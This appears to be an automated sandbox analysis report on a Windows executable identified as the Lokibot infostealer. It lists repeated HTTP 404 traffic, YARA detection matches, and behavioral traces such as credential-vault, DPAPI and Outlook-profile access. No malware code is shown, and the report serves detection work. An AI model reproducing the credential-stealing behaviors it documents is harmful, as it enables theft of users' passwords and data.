              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

              System Summary

              barindex
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000000.1285704609.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: dw7h7aQwVZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: dw7h7aQwVZ.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000000.1285704609.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/1@0/12
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\8a3743a32cd2c056101b2b9db30747f3_9e146be9-c76a-4720-bcdb-53011b87bd06
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
              Source: dw7h7aQwVZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: dw7h7aQwVZ.exeReversingLabs: Detection: 97%
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: vaultcli.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: wintypes.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: netapi32.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: samcli.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: samlib.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: userenv.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

              Data Obfuscation

              barindex
              Source: Yara matchFile source: dw7h7aQwVZ.exe, type: SAMPLE
              Source: Yara matchFile source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: dw7h7aQwVZ.exeStatic PE information: section name: .x
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
